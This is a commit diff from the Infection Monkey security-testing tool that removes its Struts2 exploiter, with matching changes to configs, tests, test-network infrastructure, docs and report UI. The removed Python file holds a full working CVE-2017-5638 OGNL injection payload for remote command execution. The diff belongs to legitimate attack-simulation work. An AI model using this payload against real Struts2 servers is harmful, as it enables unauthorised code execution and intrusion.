Merge pull request #1873 from guardicore/1869-remove-struts2-exploit
Remove Struts2 exploiter
commit
727f19ecf6
@ -54,6 +54,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- 32-bit agents. #1675
|
- 32-bit agents. #1675
|
||||||
- Log path config options. #1761
|
- Log path config options. #1761
|
||||||
- "smb_service_name" option. #1741
|
- "smb_service_name" option. #1741
|
||||||
|
- Struts2 exploiter. #1869
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -1,9 +0,0 @@
|
||||||
---
|
|
||||||
title: "Struts2"
|
|
||||||
date: 2020-07-14T08:42:30+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "linux", "windows"]
|
|
||||||
---
|
|
||||||
### Description
|
|
||||||
|
|
||||||
This exploit, CVE-2017-5638, utilizes the Struts 2 Java web framework. The logic is based on [VEX WOO's PoC](https://www.exploit-db.com/exploits/41570).
|
|
|
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
@ -27,8 +26,6 @@ class Performance(ConfigTemplate):
|
||||||
"basic_network.network_analysis.inaccessible_subnets": [
|
"basic_network.network_analysis.inaccessible_subnets": [
|
||||||
"10.2.2.0/30",
|
"10.2.2.0/30",
|
||||||
"10.2.2.8/30",
|
"10.2.2.8/30",
|
||||||
"10.2.2.24/32",
|
|
||||||
"10.2.2.23/32",
|
|
||||||
"10.2.2.21/32",
|
"10.2.2.21/32",
|
||||||
"10.2.2.19/32",
|
"10.2.2.19/32",
|
||||||
"10.2.2.18/32",
|
"10.2.2.18/32",
|
||||||
|
@ -53,8 +50,6 @@ class Performance(ConfigTemplate):
|
||||||
"10.2.2.19",
|
"10.2.2.19",
|
||||||
"10.2.2.20",
|
"10.2.2.20",
|
||||||
"10.2.2.21",
|
"10.2.2.21",
|
||||||
"10.2.2.23",
|
|
||||||
"10.2.2.24",
|
|
||||||
"10.2.2.25",
|
"10.2.2.25",
|
||||||
"10.2.3.55",
|
"10.2.3.55",
|
||||||
"10.2.3.56",
|
"10.2.3.56",
|
||||||
|
|
|
@ -1,19 +0,0 @@
|
||||||
from copy import copy
|
|
||||||
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2(ConfigTemplate):
|
|
||||||
|
|
||||||
config_values = copy(BaseTemplate.config_values)
|
|
||||||
|
|
||||||
config_values.update(
|
|
||||||
{
|
|
||||||
"basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
|
|
||||||
"basic_network.scope.depth": 2,
|
|
||||||
"basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
|
|
||||||
"internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
|
|
||||||
"internal.network.tcp_scanner.tcp_target_ports": [80, 8080],
|
|
||||||
}
|
|
||||||
)
|
|
|
@ -7,8 +7,6 @@ GCP_TEST_MACHINE_LIST = {
|
||||||
"mssql-16",
|
"mssql-16",
|
||||||
"mimikatz-14",
|
"mimikatz-14",
|
||||||
"mimikatz-15",
|
"mimikatz-15",
|
||||||
"struts2-23",
|
|
||||||
"struts2-24",
|
|
||||||
"tunneling-9",
|
"tunneling-9",
|
||||||
"tunneling-10",
|
"tunneling-10",
|
||||||
"tunneling-11",
|
"tunneling-11",
|
||||||
|
|
|
@ -22,7 +22,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse impo
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||||
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
||||||
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
|
@ -190,10 +189,6 @@ class TestMonkeyBlackbox:
|
||||||
def test_drupal_exploiter(self, island_client):
|
def test_drupal_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Struts2 exploiter is deprecated")
|
|
||||||
def test_struts_exploiter(self, island_client):
|
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
|
|
||||||
|
|
||||||
@pytest.mark.skip(reason="Weblogic exploiter is deprecated")
|
@pytest.mark.skip(reason="Weblogic exploiter is deprecated")
|
||||||
def test_weblogic_exploiter(self, island_client):
|
def test_weblogic_exploiter(self, island_client):
|
||||||
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
|
TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
|
||||||
|
|
|
@ -14,7 +14,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
|
||||||
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
|
||||||
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
|
||||||
from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
|
|
||||||
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
|
||||||
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
|
||||||
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
|
||||||
|
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
|
||||||
SmbMimikatz,
|
SmbMimikatz,
|
||||||
SmbPth,
|
SmbPth,
|
||||||
Ssh,
|
Ssh,
|
||||||
Struts2,
|
|
||||||
Tunneling,
|
Tunneling,
|
||||||
Weblogic,
|
Weblogic,
|
||||||
WmiMimikatz,
|
WmiMimikatz,
|
||||||
|
|
|
@ -22,8 +22,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
|
||||||
[Nr. 19 WebLogic](#_Toc526517181)<br>
|
[Nr. 19 WebLogic](#_Toc526517181)<br>
|
||||||
[Nr. 21 Scan](#_Toc526517196)<br>
|
[Nr. 21 Scan](#_Toc526517196)<br>
|
||||||
[Nr. 22 Scan](#_Toc526517197)<br>
|
[Nr. 22 Scan](#_Toc526517197)<br>
|
||||||
[Nr. 23 Struts2](#_Toc536021476)<br>
|
|
||||||
[Nr. 24 Struts2](#_Toc536021477)<br>
|
|
||||||
[Nr. 25 Zerologon](#_Toc536021478)<br>
|
[Nr. 25 Zerologon](#_Toc536021478)<br>
|
||||||
[Nr. 3-45 Powershell](#_Toc536021479)<br>
|
[Nr. 3-45 Powershell](#_Toc536021479)<br>
|
||||||
[Nr. 3-46 Powershell](#_Toc536021480)<br>
|
[Nr. 3-46 Powershell](#_Toc536021480)<br>
|
||||||
|
@ -776,74 +774,6 @@ Update all requirements using deployment script:<br>
|
||||||
</tbody>
|
</tbody>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc536021476" class="anchor"></span>Nr. <strong>23</strong> Struts2</p>
|
|
||||||
<p>(10.2.2.23)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Ubuntu 16.04.05 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p>struts2 2.3.15.1,</p>
|
|
||||||
<p>tomcat 9.0.0.M9</p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>8080</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td></td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
|
||||||
<thead>
|
|
||||||
<tr class="header">
|
|
||||||
<th><p><span id="_Toc536021477" class="anchor"></span>Nr. <strong>24</strong> Struts2</p>
|
|
||||||
<p>(10.2.2.24)</p></th>
|
|
||||||
<th>(Vulnerable)</th>
|
|
||||||
</tr>
|
|
||||||
</thead>
|
|
||||||
<tbody>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>OS:</td>
|
|
||||||
<td><strong>Windows 10 x64</strong></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Software:</td>
|
|
||||||
<td><p>JDK,</p>
|
|
||||||
<p>struts2 2.3.15.1,</p>
|
|
||||||
<p>tomcat 9.0.0.M9</p></td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Default server’s port:</td>
|
|
||||||
<td>8080</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="even">
|
|
||||||
<td>Server’s config:</td>
|
|
||||||
<td>Default</td>
|
|
||||||
</tr>
|
|
||||||
<tr class="odd">
|
|
||||||
<td>Notes:</td>
|
|
||||||
<td></td>
|
|
||||||
</tr>
|
|
||||||
</tbody>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
<table>
|
<table>
|
||||||
<thead>
|
<thead>
|
||||||
<tr class="header">
|
<tr class="header">
|
||||||
|
|
|
@ -99,14 +99,6 @@ data "google_compute_image" "scan-22" {
|
||||||
name = "scan-22"
|
name = "scan-22"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
}
|
}
|
||||||
data "google_compute_image" "struts2-23" {
|
|
||||||
name = "struts2-23"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "struts2-24" {
|
|
||||||
name = "struts2-24"
|
|
||||||
project = local.monkeyzoo_project
|
|
||||||
}
|
|
||||||
data "google_compute_image" "zerologon-25" {
|
data "google_compute_image" "zerologon-25" {
|
||||||
name = "zerologon-25"
|
name = "zerologon-25"
|
||||||
project = local.monkeyzoo_project
|
project = local.monkeyzoo_project
|
||||||
|
|
|
@ -480,36 +480,6 @@ resource "google_compute_instance_from_template" "scan-22" {
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "struts2-23" {
|
|
||||||
name = "${local.resource_prefix}struts2-23"
|
|
||||||
source_instance_template = local.default_ubuntu
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.struts2-23.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.23"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "struts2-24" {
|
|
||||||
name = "${local.resource_prefix}struts2-24"
|
|
||||||
source_instance_template = local.default_windows
|
|
||||||
boot_disk{
|
|
||||||
initialize_params {
|
|
||||||
image = data.google_compute_image.struts2-24.self_link
|
|
||||||
}
|
|
||||||
auto_delete = true
|
|
||||||
}
|
|
||||||
network_interface {
|
|
||||||
subnetwork="${local.resource_prefix}monkeyzoo-main"
|
|
||||||
network_ip="10.2.2.24"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
resource "google_compute_instance_from_template" "zerologon-25" {
|
resource "google_compute_instance_from_template" "zerologon-25" {
|
||||||
name = "${local.resource_prefix}zerologon-25"
|
name = "${local.resource_prefix}zerologon-25"
|
||||||
source_instance_template = local.default_windows
|
source_instance_template = local.default_windows
|
||||||
|
|
|
@ -1,90 +0,0 @@
|
||||||
"""
|
|
||||||
Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
|
|
||||||
code used is from https://www.exploit-db.com/exploits/41570/
|
|
||||||
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
|
|
||||||
"""
|
|
||||||
import http.client
|
|
||||||
import logging
|
|
||||||
import re
|
|
||||||
import ssl
|
|
||||||
import urllib.error
|
|
||||||
import urllib.parse
|
|
||||||
import urllib.request
|
|
||||||
from typing import List, Tuple
|
|
||||||
|
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300
|
|
||||||
|
|
||||||
|
|
||||||
class Struts2Exploiter(WebRCE):
|
|
||||||
_EXPLOITED_SERVICE = "Struts2"
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(Struts2Exploiter, self).__init__(host, None)
|
|
||||||
|
|
||||||
def get_exploit_config(self):
|
|
||||||
exploit_config = super(Struts2Exploiter, self).get_exploit_config()
|
|
||||||
exploit_config["dropper"] = True
|
|
||||||
return exploit_config
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]:
|
|
||||||
url_list = WebRCE.build_potential_urls(ip, ports)
|
|
||||||
url_list = [Struts2Exploiter.get_redirected(url) for url in url_list]
|
|
||||||
return url_list
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def get_redirected(url):
|
|
||||||
# Returns false if url is not right
|
|
||||||
headers = {"User-Agent": "Mozilla/5.0"}
|
|
||||||
request = urllib.request.Request(url, headers=headers)
|
|
||||||
try:
|
|
||||||
return urllib.request.urlopen(
|
|
||||||
request, context=ssl._create_unverified_context() # noqa: DUO122
|
|
||||||
).geturl()
|
|
||||||
except urllib.error.URLError:
|
|
||||||
logger.error("Can't reach struts2 server")
|
|
||||||
return False
|
|
||||||
|
|
||||||
def exploit(self, url, cmd):
|
|
||||||
"""
|
|
||||||
:param url: Full url to send request to
|
|
||||||
:param cmd: Code to try and execute on host
|
|
||||||
:return: response
|
|
||||||
"""
|
|
||||||
cmd = re.sub(r"\\", r"\\\\", cmd)
|
|
||||||
cmd = re.sub(r"'", r"\\'", cmd)
|
|
||||||
payload = (
|
|
||||||
"%%{(#_='multipart/form-data')."
|
|
||||||
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
|
|
||||||
"(#_memberAccess?"
|
|
||||||
"(#_memberAccess=#dm):"
|
|
||||||
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
|
|
||||||
"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
|
|
||||||
"(#ognlUtil.getExcludedPackageNames().clear())."
|
|
||||||
"(#ognlUtil.getExcludedClasses().clear())."
|
|
||||||
"(#context.setMemberAccess(#dm))))."
|
|
||||||
"(#cmd='%s')."
|
|
||||||
"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
|
|
||||||
"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
|
|
||||||
"(#p=new java.lang.ProcessBuilder(#cmds))."
|
|
||||||
"(#p.redirectErrorStream(true)).(#process=#p.start())."
|
|
||||||
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
|
|
||||||
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
|
|
||||||
"(#ros.flush())}" % cmd
|
|
||||||
)
|
|
||||||
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
|
|
||||||
try:
|
|
||||||
request = urllib.request.Request(url, headers=headers)
|
|
||||||
# Timeout added or else we would wait for all monkeys' output
|
|
||||||
page = urllib.request.urlopen(request).read()
|
|
||||||
except AttributeError:
|
|
||||||
# If url does not exist
|
|
||||||
return False
|
|
||||||
except http.client.IncompleteRead as e:
|
|
||||||
page = e.partial.decode()
|
|
||||||
|
|
||||||
return page
|
|
|
@ -18,7 +18,6 @@ BASIC = {
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Log4ShellExploiter",
|
"Log4ShellExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
|
|
@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/sshexec/",
|
"/exploiters/sshexec/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["Struts2Exploiter"],
|
|
||||||
"title": "Struts2 Exploiter",
|
|
||||||
"safe": True,
|
|
||||||
"info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
|
|
||||||
"https://www.exploit-db.com/exploits/41570 .",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["WebLogicExploiter"],
|
"enum": ["WebLogicExploiter"],
|
||||||
|
|
|
@ -81,7 +81,6 @@ class AWSExporter(Exporter):
|
||||||
"shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
|
"shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
|
||||||
"shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
|
"shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
|
||||||
"strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
|
"strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
|
||||||
ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
|
|
||||||
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
|
ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
|
||||||
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
|
ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
|
||||||
}
|
}
|
||||||
|
@ -387,24 +386,6 @@ class AWSExporter(Exporter):
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||||
)
|
)
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def _handle_struts2_issue(issue, instance_arn):
|
|
||||||
|
|
||||||
return AWSExporter._build_generic_finding(
|
|
||||||
severity=10,
|
|
||||||
title="Struts2 servers are vulnerable to remote code execution.",
|
|
||||||
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
|
|
||||||
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
|
|
||||||
"remote code execution attack."
|
|
||||||
"The attack was made possible because the server is using an old "
|
|
||||||
"version of Jakarta based file "
|
|
||||||
"upload Multipart parser.".format(
|
|
||||||
machine=issue["machine"], ip_address=issue["ip_address"]
|
|
||||||
),
|
|
||||||
instance_arn=instance_arn,
|
|
||||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
|
||||||
)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _handle_weblogic_issue(issue, instance_arn):
|
def _handle_weblogic_issue(issue, instance_arn):
|
||||||
|
|
||||||
|
|
|
@ -28,7 +28,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
|
||||||
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
|
||||||
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
|
||||||
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
|
||||||
WEBLOGIC = ExploiterDescriptor(
|
WEBLOGIC = ExploiterDescriptor(
|
||||||
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
||||||
)
|
)
|
||||||
|
|
|
@ -20,7 +20,6 @@ import guardicoreLogoImage from '../../images/guardicore-logo.png'
|
||||||
import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
|
import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
|
||||||
import '../../styles/App.css';
|
import '../../styles/App.css';
|
||||||
import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
|
import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
|
||||||
import {struts2IssueOverview, struts2IssueReport} from './security/issues/Struts2Issue';
|
|
||||||
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
|
import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
|
||||||
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
|
import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
|
||||||
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
|
import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
|
||||||
|
@ -78,11 +77,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
},
|
},
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'Struts2Exploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: struts2IssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: struts2IssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'WebLogicExploiter': {
|
'WebLogicExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: webLogicIssueReport,
|
[this.issueContentTypes.REPORT]: webLogicIssueReport,
|
||||||
|
|
|
@ -1,26 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function struts2IssueOverview() {
|
|
||||||
return (<li>Struts2 servers are vulnerable to remote code execution. (<a
|
|
||||||
href="https://cwiki.apache.org/confluence/display/WW/S2-045">
|
|
||||||
CVE-2017-5638</a>)</li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function struts2IssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
Struts2 server at <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
|
|
||||||
className="badge badge-danger">remote code execution</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the server is using an old version of Jakarta based file upload
|
|
||||||
Multipart parser. For possible work-arounds and more info read <a
|
|
||||||
href="https://cwiki.apache.org/confluence/display/WW/S2-045"
|
|
||||||
>here</a>.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -57,7 +57,6 @@
|
||||||
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
|
{"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
|
||||||
{"name": "Struts2Exploiter", "supported_os": ["linux", "windows"], "options": {}},
|
|
||||||
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
|
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
|
||||||
]
|
]
|
||||||
|
|
|
@ -49,7 +49,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"ZerologonExploiter",
|
"ZerologonExploiter",
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
|
|
|
@ -5,7 +5,6 @@
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
"WmiExploiter",
|
"WmiExploiter",
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
"WebLogicExploiter",
|
||||||
"HadoopExploiter",
|
"HadoopExploiter",
|
||||||
"MSSQLExploiter",
|
"MSSQLExploiter",
|
||||||
|
|
|
@ -202,7 +202,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
|
||||||
{"name": "DrupalExploiter", "supported_os": [], "options": {}},
|
{"name": "DrupalExploiter", "supported_os": [], "options": {}},
|
||||||
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
{"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
|
||||||
{"name": "Struts2Exploiter", "supported_os": [], "options": {}},
|
|
||||||
{"name": "WebLogicExploiter", "supported_os": [], "options": {}},
|
{"name": "WebLogicExploiter", "supported_os": [], "options": {}},
|
||||||
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
|
{"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
|
||||||
],
|
],
|
||||||
|
|
|
@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i
|
||||||
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
|
||||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
